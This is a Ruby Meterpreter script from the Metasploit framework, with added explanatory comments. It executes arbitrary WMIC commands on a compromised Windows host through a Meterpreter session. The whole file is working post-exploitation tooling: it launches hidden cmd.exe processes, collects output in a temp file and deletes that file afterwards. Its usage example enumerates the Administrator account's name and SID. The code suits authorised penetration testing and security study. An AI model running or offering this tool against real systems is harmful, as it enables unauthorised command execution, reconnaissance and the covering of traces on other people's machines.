  1. ##
  2. # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  3. # If you'd like to improve this script, please try to port it as a post
  4. # module instead. Thank you.
  5. ##
  6. #Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
  7. # and Windows XP and Windows 2008 targets.
  8. #Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
  9. ################## Variable Declarations ##################
# Session handle used by the helper functions below; wininfo is collected here
# but not read anywhere else in this script.
session = client
wininfo = client.sys.config.sysinfo
# Option table. Kept in a class variable because the top-level `usage` def
# below reads it to print the option list.
@@exec_opts = Rex::Parser::Arguments.new(
  '-h' => [false, 'Help menu.'],
  '-c' => [true, 'Command to execute. The command must be enclosed in double quotes.'],
  '-f' => [true, 'File where to saved output of command.'],
  '-s' => [true, 'Text file with list of commands, one per line.']
)
# Values filled in by the option parser in the Main section.
commands, script, outfile = [], [], nil
  23. ################## Function Declarations ##################
  24. # Function for running a list of WMIC commands stored in an array, returns a string
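# Runs each WMIC command on the target, collecting all output in one file
# under %TEMP%, then returns the file's contents and deletes it.
#
# @param session [Object] the Meterpreter client session
# @param wmiccmds [Array<String>, nil] WMIC argument strings, one command
#   each; nil is treated as an empty list
# @return [String] concatenated output of all commands ('' if nothing ran
#   or an error was reported)
def wmicexec(session, wmiccmds = nil)
  tmpout = ''
  wmicfl = nil
  session.response_timeout = 120
  begin
    tmp = session.sys.config.getenv('TEMP')
    # Output file is a 5-digit random name in %TEMP%. The name is predictable,
    # so another local user on the target could pre-create or read it; this
    # script does not guard against that.
    wmicfl = tmp + "\\" + format("%.5d", rand(100_000))
    Array(wmiccmds).each do |wmi|
      print_status "running command wmic #{wmi}"
      print_line wmicfl
      # wmi is operator-supplied and is handed to cmd.exe unquoted; /append
      # makes every command write into the same output file.
      r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
      sleep(2)
      # Making sure that wmic finishes before executing the next wmic command:
      # keep polling until no process entry is named wmic.exe. Every entry is
      # checked, so the wait does not depend on where wmic.exe appears in the
      # list, and an empty list ends the wait instead of looping forever.
      prog2check = "wmic.exe"
      loop do
        still_running = session.sys.process.get_processes.any? do |x|
          x['name'].to_s.downcase == prog2check
        end
        break unless still_running
        sleep(0.5)
      end
      r.close
    end
    # Read the output file of the wmic commands
    wmioutfile = session.fs.file.new(wmicfl, "rb")
    tmpout << wmioutfile.read until wmioutfile.eof?
    wmioutfile.close
  rescue ::StandardError => e
    # StandardError, not Exception: interrupts and other non-StandardError
    # exceptions must propagate rather than be reported as WMIC errors.
    print_status("Error running WMIC commands: #{e.class} #{e}")
  ensure
    # We delete the file with the wmic command output, but only when a path
    # was actually built (getenv may have failed before that point).
    if wmicfl
      c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
      c.close
    end
  end
  tmpout
end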
  64. # Function for writing results of other functions to a file
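# Function for writing results of other functions to a file
#
# @param file2wrt [String] path of the file to append to (created if missing)
# @param data2wrt [String] text whose lines are appended, one puts per line
# @return [nil]
def filewrt(file2wrt, data2wrt)
  # Block form closes the handle even if a write raises.
  ::File.open(file2wrt, "a") do |output|
    data2wrt.each_line { |d| output.puts(d) }
  end
  nil
end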
  72. #check for proper Meterpreter Platform
  73. def unsupported
  74. print_error("This version of Meterpreter is not supported with this Script!")
  75. raise Rex::Script::Completed
  76. end
  77. def usage
  78. print_line("Windows WMIC Command Execution Meterpreter Script ")
  79. print_line @@exec_opts.usage
  80. print_line("USAGE:")
  81. print_line("run wmic -c \"WMIC Command Argument\"\n")
  82. print_line("NOTE:")
  83. print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
  84. print_line("for output retrieval. Arguments must be encased in double quotes and special characters escaped\n")
  85. print_line("Example:")
  86. print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
  87. raise Rex::Script::Completed
  88. end
  89. ################## Main ##################
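# Parse the script arguments; the handlers fill commands/outfile declared above.
@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-c"
    # Several commands may be passed in one -c, separated by "/". This also
    # means a WMIC argument containing "/" is split apart (see NOTE in usage).
    commands.concat(val.split("/"))
  when "-s"
    script = val
    raise "Command List File does not exists!" unless ::File.exist?(script)
    # foreach closes the local file when done; open without a block would leak it.
    ::File.foreach(script) do |line|
      next if line.strip.empty?
      next if line.start_with?("#")
      commands << line.chomp
    end
  when "-f"
    outfile = val
  when "-h"
    usage
  else
    print_error "Unknown option: #{opt}"
    usage
  end
end
usage if args.empty?
unsupported if client.platform != 'windows'
if outfile
  print_status("Saving output of WMIC to #{outfile}")
  filewrt(outfile, wmicexec(session, commands))
else
  print_status wmicexec(session, commands)
end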